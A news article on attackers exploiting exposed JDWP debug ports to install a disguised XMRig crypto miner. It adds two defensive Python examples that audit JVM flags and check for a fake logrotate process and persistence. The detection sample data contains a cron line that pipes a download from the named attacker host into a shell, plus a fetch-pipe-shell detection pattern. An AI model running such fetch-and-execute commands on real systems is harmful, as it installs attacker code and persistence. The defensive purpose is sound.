
Hackers attack servers to mine cryptocurrencies


Hackers are now attacking systems to carry out crypto mining activities, according to a report from researchers from cloud security firm Wiz. The researchers stated that the hackers are weaponizing exposed Java Debug Wire Protocol (JDWP) interfaces to obtain code execution capabilities on compromised systems.

According to the report, after gaining code execution, the hackers deployed crypto miners on the compromised hosts. “The attacker used a modified version of XMRig with a hard-coded configuration, allowing them to avoid suspicious command-line arguments that are often flagged by defenders,” the researchers said. They added that the payload used mining pool proxies to conceal the attacker’s crypto wallet, preventing investigators from tracing it further.

Hackers weaponize exposed JDWP to carry out mining activities

The researchers observed the activity against their honeypot servers running TeamCity, a popular continuous integration and continuous delivery (CI/CD) tool. JDWP is a communication protocol used in Java for debugging. It lets a debugger work with a separate process, whether that is a Java application on the same computer or one on a remote computer.

However, because JDWP lacks an access control mechanism, exposing it to the internet opens an attack vector that hackers can abuse as an entry point to gain full control over the running Java process. Put simply, the misconfiguration can be used to inject and execute arbitrary commands in order to set up persistence on the host and ultimately run malicious payloads.

“While JDWP is not enabled by default in most Java applications, it is commonly used in development and debugging environments,” the researchers said. “Many popular applications automatically start a JDWP server when run in debug mode, often without making the risks obvious to the developer. If improperly secured or left exposed, this can open the door to remote code execution (RCE) vulnerabilities.”
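An added example, not from the Wiz report or any of the applications named here: a Python audit of JVM command lines for JDWP listeners. The sample command lines are constructed and the function and status names are illustrative; `-agentlib:jdwp`, `-Xrunjdwp` and the `server`/`address` sub-options are the standard JDK flags.

```python
import re

# Modern (-agentlib:jdwp=...) and legacy (-Xrunjdwp:...) forms of the JDK agent flag.
JDWP_OPT = re.compile(r"(?:-agentlib:jdwp=|-Xrunjdwp:)(\S+)")
LOOPBACK = {"localhost", "127.0.0.1", "::1", "[::1]"}

# Constructed sample command lines, as they would appear in `ps` output.
SAMPLES = [
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar ci.jar",
    "java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005 -jar ci.jar",
    "java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,address=127.0.0.1:8000 -jar app.jar",
    "java -Xmx2g -jar app.jar",
]


def audit_jdwp(cmdline, java_major=17):
    """Classify one JVM command line as 'none', 'outbound', 'loopback' or 'exposed'.

    java_major matters: a bare port (address=5005) binds to localhost on
    JDK 9 and later, but to every interface on JDK 8 and earlier.
    """
    m = JDWP_OPT.search(cmdline)
    if not m:
        return "none"
    opts = dict(kv.split("=", 1) for kv in m.group(1).split(",") if "=" in kv)
    if opts.get("server", "n") != "y":
        return "outbound"  # JVM dials out to a debugger, no listening socket
    host, _, _port = opts.get("address", "").rpartition(":")
    if not host:  # bare port or no address: the JDK default decides the bind host
        return "loopback" if java_major >= 9 else "exposed"
    return "loopback" if host in LOOPBACK else "exposed"


def audit_all(cmdlines, java_major=17):
    """Return only the command lines whose debugger listener is reachable off-host."""
    return [c for c in cmdlines if audit_jdwp(c, java_major) == "exposed"]


if __name__ == "__main__":
    for line in SAMPLES:
        print(f"{audit_jdwp(line):9} {line}")
```

A `loopback` result still leaves the debugger open to every local user and process on the host, since JDWP itself has no access control.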

Some of the applications that may launch a JDWP server when in debug mode include TeamCity, Apache Tomcat, Spring Boot, Elasticsearch, Jenkins, and others. Data from GreyNoise showed that over 2,600 IP addresses have been scanning for JDWP endpoints in the last 24 hours, of which 1,500 are malicious and 1,100 are classified as suspicious. The report mentioned that most of these IP addresses originated from Hong Kong, Germany, the United States, Singapore, and China.

The researchers detail how the attacks are being carried out

In the attacks observed by the researchers, the hackers take advantage of the fact that the Java Virtual Machine (JVM) listens for debugger connections on port 5005, and scan the internet for open JDWP ports. A JDWP-Handshake request is then sent to confirm that the interface is active. Once the service is confirmed to be exposed and interactive, the hackers execute a command that fetches and runs a dropper shell script, which carries out a series of actions.

These actions include killing all competing miners or any high-CPU processes on the system, dropping a modified version of the XMRig miner for the appropriate system architecture from an external server (“awarmcorner[.]world”) into “~/.config/logrotate”, establishing persistence by setting cron jobs to ensure that the payload is re-fetched and re-executed after every shell login, reboot, or scheduled time interval, and deleting itself on exit.

“Being open-source, XMRig offers attackers the convenience of easy customization, which in this case involved stripping out all command-line parsing logic and hardcoding the configuration,” the researchers said. “This tweak not only simplifies deployment but also allows the payload to mimic the original logrotate process more convincingly.”
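The two host artifacts described above, a miner posing as logrotate under `~/.config` and persistence entries that re-fetch it, turned into checks; this is an added example, not the researchers' tooling. The process list and cron lines are constructed samples, `SYSTEM_DIRS` is an assumption about where a packaged logrotate lives, and the `PLACEHOLDER` URL path is not from the report.

```python
import re
from pathlib import PurePosixPath

# Indicators taken from the article: drop path and download host (refanged for matching).
DROP_SUFFIX = ".config/logrotate"
C2_HOST = "awarmcorner[.]world".replace("[.]", ".")
# Assumption: directories where a distribution-packaged logrotate is installed.
SYSTEM_DIRS = {"/usr/sbin", "/usr/bin", "/sbin", "/bin"}
# Heuristic: a download piped straight into a shell.
FETCH_PIPE = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b")

# Constructed samples: (pid, process name, executable path) and crontab lines.
PROCS = [
    (812, "logrotate", "/usr/sbin/logrotate"),
    (4411, "logrotate", "/home/build/.config/logrotate"),
    (977, "java", "/usr/lib/jvm/jdk/bin/java"),
]
CRON = [
    "# m h dom mon dow command",
    "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf",
    "@reboot /home/build/.config/logrotate",
    f"*/30 * * * * curl -fsSL http://{C2_HOST}/PLACEHOLDER | sh",
]


def masquerading(procs):
    """Return pids named logrotate whose binary lies outside SYSTEM_DIRS."""
    return [pid for pid, name, exe in procs
            if name == "logrotate"
            and str(PurePosixPath(exe).parent) not in SYSTEM_DIRS]


def suspicious_lines(lines):
    """Return (line_no, reasons) for cron or shell-startup lines that match."""
    out = []
    for n, line in enumerate(lines, 1):
        text = line.strip()
        if not text or text.startswith("#"):
            continue
        reasons = [tag for tag, hit in (
            ("drop-path", DROP_SUFFIX in text),
            ("download-host", C2_HOST in text),
            ("fetch-pipe-shell", bool(FETCH_PIPE.search(text))),
        ) if hit]
        if reasons:
            out.append((n, reasons))
    return out
```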

This disclosure comes as NSFOCUS noted that a new and evolving Go-based malware named Hpingbot, which has been targeting both Windows and Linux systems, can launch distributed denial-of-service (DDoS) attacks using hping3.
